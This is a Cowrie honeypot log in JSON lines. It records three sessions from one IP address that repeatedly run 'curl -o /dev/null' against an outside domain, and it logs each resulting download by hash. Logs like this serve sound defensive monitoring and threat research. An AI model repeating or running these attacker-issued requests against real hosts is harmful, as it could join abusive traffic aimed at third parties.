{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.485108Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.488444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.489721Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.492229Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.493056Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.494572Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.495377Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.501116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.526880Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.529703Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.533333Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.535966Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.537269Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.538241Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.542405Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.543200Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.545286Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.546033Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.580054Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.581755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.583176Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.583891Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.585932Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.586684Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.588411Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.589060Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.622347Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.624266Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.625479Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.626250Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.628608Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.629698Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.632212Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.633893Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.634578Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.687334Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.689293Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.691536Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.692534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.693266Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.696485Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.697220Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.697902Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.699563Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.700063Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.702939Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.740246Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.743459Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.744712Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.745214Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.749274Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.751592Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.752351Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.753880Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.754780Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.784513Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.786378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.788917Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.791105Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.792015Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.794237Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.795498Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.798171Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.799011Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.832350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.833436Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.833888Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.839163Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.839842Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.843741Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.844314Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.872148Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.874319Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.877896Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.880854Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.881815Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.885422Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.886009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.890052Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.891291Z","src_ip":"212.227.125.160","session":"9f264c568782"}
